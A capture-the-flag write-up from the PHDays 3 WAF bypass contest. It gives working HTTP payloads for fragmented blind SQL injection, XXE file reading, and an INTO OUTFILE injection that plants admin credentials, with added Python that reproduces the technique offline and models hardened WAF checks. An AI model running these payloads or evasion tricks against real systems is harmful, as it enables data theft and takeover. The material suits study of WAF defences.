Untitled
a guest
May 28th, 2013
= PHDays 3 WAF bypass contest
== Stage 1
Blind (boolean-based) SQLi. The payload is split across many params with the same name, search_name; the application concatenates the values into one string, while the WAF evidently checks each value on its own and so never sees a whole SQL keyword:
POST /api/ HTTP/1.1
Host: 62.148.7.178
Content-Length: 1985
Referer: http://62.148.7.178/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: *
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

<?xml version="1.0"?><request><search_name>
</search_name><search_name>Kn</search_name><search_name>ig</search_name><search_name>ht</search_name><search_name>
'</search_name><search_name>
a</search_name><search_name>nd</search_name><search_name>
(</search_name><search_name>or</search_name><search_name>d(</search_name><search_name>su</search_name><search_name>bs</search_name><search_name>tr</search_name><search_name>in</search_name><search_name>g(</search_name><search_name>(s</search_name><search_name>el</search_name><search_name>ec</search_name><search_name>t
</search_name><search_name>fl</search_name><search_name>ag</search_name><search_name>
f</search_name><search_name>ro</search_name><search_name>m
</search_name><search_name>se</search_name><search_name>cr</search_name><search_name>et</search_name><search_name>_t</search_name><search_name>bl</search_name><search_name>
w</search_name><search_name>he</search_name><search_name>re</search_name><search_name>
f</search_name><search_name>la</search_name><search_name>g
</search_name><search_name>=
</search_name><search_name>'3</search_name><search_name>06</search_name><search_name>6d</search_name><search_name>7f</search_name><search_name>69</search_name><search_name>d7</search_name><search_name>98</search_name><search_name>70</search_name><search_name>06</search_name><search_name>8f</search_name><search_name>ae</search_name><search_name>85</search_name><search_name>21</search_name><search_name>c0</search_name><search_name>61</search_name><search_name>4b</search_name><search_name>2'</search_name><search_name>
l</search_name><search_name>im</search_name><search_name>it</search_name><search_name>
0</search_name><search_name>,1</search_name><search_name>),</search_name><search_name>1,</search_name><search_name>1)</search_name><search_name>)&gt;</search_name><search_name>
4</search_name><search_name>9 </search_name><search_name>)
</search_name><search_name>--</search_name><search_name>
a</search_name></request>

Flag #1 (MySQL, database test, table secret_tbl, column flag):
3066d7f69d79870068fae8521c0614b2
The second column of the same table contains the path /var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag
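Added example (Python, not code from the paste): an offline reproduction of the stage 1 technique. It fragments a payload into two-character search_name elements the way the request above does, shows that a keyword check run per element never fires while the same check run on the concatenated value does, and drives the boolean condition the request assembles (ord(substring(...,pos,1)) > threshold) through a per-character binary search against a simulated backend. The simulated backend, the keyword list, the chunk size and the use of the reported flag as the simulated column value are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Added example, not code from the paste. The boolean condition is the one the stage 1
# request assembles; {pos} and {threshold} are the two values that request hard-codes as 1 and 49.
SQL = ("Knight' and (ord(substring((select flag from secret_tbl limit 0,1),"
       "{pos},1))>{threshold} ) -- a")

# Simulated column value (assumption): the flag the paste reports for stage 1.
SECRET = "3066d7f69d79870068fae8521c0614b2"

# Keywords a signature WAF would look for (assumption; chosen to cover this payload).
KEYWORDS = re.compile(r"\b(select|union|substring|from|where|limit|into|outfile)\b", re.I)


def fragment(payload: str, size: int = 2) -> str:
    """Split payload into size-character chunks, one <search_name> element per chunk,
    which is the shape of the request body in the paste."""
    chunks = [payload[i:i + size] for i in range(0, len(payload), size)]
    body = "".join(f"<search_name>{escape(c)}</search_name>" for c in chunks)
    return f'<?xml version="1.0"?><request>{body}</request>'


def reassemble(xml_body: str) -> str:
    """What the vulnerable application evidently does: concatenate every search_name value."""
    root = ET.fromstring(xml_body)
    return "".join(el.text or "" for el in root.iter("search_name"))


def per_element_check(xml_body: str) -> bool:
    """Naive WAF: each element's text is matched on its own. True means 'block'."""
    root = ET.fromstring(xml_body)
    return any(KEYWORDS.search(el.text or "") for el in root.iter("search_name"))


def reassembled_check(xml_body: str) -> bool:
    """Hardened WAF: match the value the application will actually use."""
    return bool(KEYWORDS.search(reassemble(xml_body)))


def fake_backend(xml_body: str) -> bool:
    """Stand-in for the contest server (assumption): reassembles the fragments, then evaluates
    the injected comparison against SECRET. True/False is all a blind injection observes."""
    query = reassemble(xml_body)
    m = re.search(r"substring\(.*?\),(\d+),1\)\)>(\d+)", query)
    if not m:
        return False
    pos, threshold = int(m.group(1)), int(m.group(2))
    return pos <= len(SECRET) and ord(SECRET[pos - 1]) > threshold


def oracle(pos: int, threshold: int) -> bool:
    """One blind probe: fragment the condition, send it, read the boolean answer."""
    return fake_backend(fragment(SQL.format(pos=pos, threshold=threshold)))


def extract(probe, length: int) -> str:
    """Recover `length` characters with a binary search over the ASCII range per position,
    using a probe that answers 'is ord(char at pos) > threshold?'."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127          # invariant: lo <= ord(char) <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    body = fragment(SQL.format(pos=1, threshold=49))
    print("per-element check blocks:", per_element_check(body))   # False
    print("reassembled check blocks:", reassembled_check(body))   # True
    print("recovered:", extract(oracle, len(SECRET)))
```

The defensive point is in reassembled_check: a WAF that inspects the request the way the application will consume it (after concatenating repeated parameters) is not fooled by fragmentation, whatever the chunk size.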
== Flag 2
XXE. Notice the Content-Type trick that turned the WAF off: the body is still XML, but the declared type (multipart/whatever, charset EUC-JP) is one the WAF does not parse, so it skips the body while the application still feeds it to its XML parser. The external entity reads the file at the path leaked in stage 1:
POST /api/ HTTP/1.1
Host: 62.148.7.178
Content-Length: 176
Referer: http://62.148.7.178/
Content-Type: multipart/whatever; charset=EUC-JP
Accept-Encoding: *
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

<?xml version="1.0" standalone="no"?><!DOCTYPE x [<!ENTITY e SYSTEM
'/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]><request><search_name>&e;</search_name></request>
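Added example (Python, not code from the paste): a model of the gating decision the flag 2 and flag 3 requests exploit, and the check a WAF would need instead. naive_should_inspect looks only at the declared Content-Type, which is why bodies sent as multipart/whatever or asdsadsa went uninspected; hardened_should_inspect looks at the body itself, and external_entities uses expat's entity-declaration callback to spot a SYSTEM entity without resolving it. The set of media types the WAF parses, the sample bodies and the blocking policy are assumptions of this example; the real fix belongs in the application, whose XML parser should not resolve external entities at all.

```python
from xml.parsers import expat

# Added example, not code from the paste. Constructed bodies: the flag 2 request body
# from the paste, and a harmless search for comparison.
XXE_BODY = ('<?xml version="1.0" standalone="no"?>'
            "<!DOCTYPE x [<!ENTITY e SYSTEM "
            "'/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]>"
            "<request><search_name>&e;</search_name></request>")
PLAIN_BODY = '<?xml version="1.0"?><request><search_name>Knight</search_name></request>'

# Media types the WAF knows how to parse (assumption, modelled on the contest: the
# form-encoded stage 1 body was inspected, multipart/whatever and asdsadsa were not).
PARSED_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data",
                "application/xml", "text/xml", "application/json"}


def media_type(content_type: str) -> str:
    """'multipart/whatever; charset=EUC-JP' -> 'multipart/whatever'."""
    return content_type.split(";", 1)[0].strip().lower()


def naive_should_inspect(content_type: str) -> bool:
    """Gate body inspection on the declared type: the behaviour the paste exploits."""
    return media_type(content_type) in PARSED_TYPES


def looks_like_xml(body: str) -> bool:
    """Cheap sniff: the application's XML parser will accept this regardless of the header."""
    return body.lstrip("\ufeff \t\r\n").startswith("<")


def hardened_should_inspect(content_type: str, body: str) -> bool:
    """Decide by what the body is, not by what the header claims."""
    return naive_should_inspect(content_type) or looks_like_xml(body)


def external_entities(body: str) -> list:
    """Return (name, system_id) for every entity the DTD declares with a SYSTEM or PUBLIC
    identifier, i.e. the XXE vector, without resolving anything."""
    found = []
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append((name, system_id))

    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is installed, so expat never opens the referenced file.
    try:
        parser.Parse(body, True)
    except expat.ExpatError:
        pass  # malformed input is rejected anyway; declarations seen so far are still reported
    return found


def block_request(content_type: str, body: str) -> bool:
    """WAF decision for one request: True means block."""
    if not hardened_should_inspect(content_type, body):
        return False
    return bool(external_entities(body))


if __name__ == "__main__":
    ct = "multipart/whatever; charset=EUC-JP"
    print("naive WAF inspects flag 2 body:", naive_should_inspect(ct))       # False
    print("hardened WAF blocks flag 2 body:", block_request(ct, XXE_BODY))  # True
    print("declared external entities:", external_entities(XXE_BODY))
```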
== Flag 3
494bf6673d0f0b8fafac5b637de9a70d
Write an htpasswd file via SQLi (UNION SELECT ... INTO OUTFILE, again behind an unrecognized Content-Type so the WAF ignores the body), log in with the planted credentials (user admin, password matching the 13-character traditional crypt(3) hash), grab the flag:
POST /api/ HTTP/1.1
Host: 62.148.7.178
Content-Length: 172
Referer: http://62.148.7.178/
Content-Type: asdsadsa; charset=EUC-JP
Accept-Encoding: *
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

<?xml version="1.0" standalone="no"?><request><search_name>asd' UNION
select 'admin:XfOn8YD6hQ.NU' into outfile
'/var/www/thirdstage/winnerpwd' -- a</search_name></request>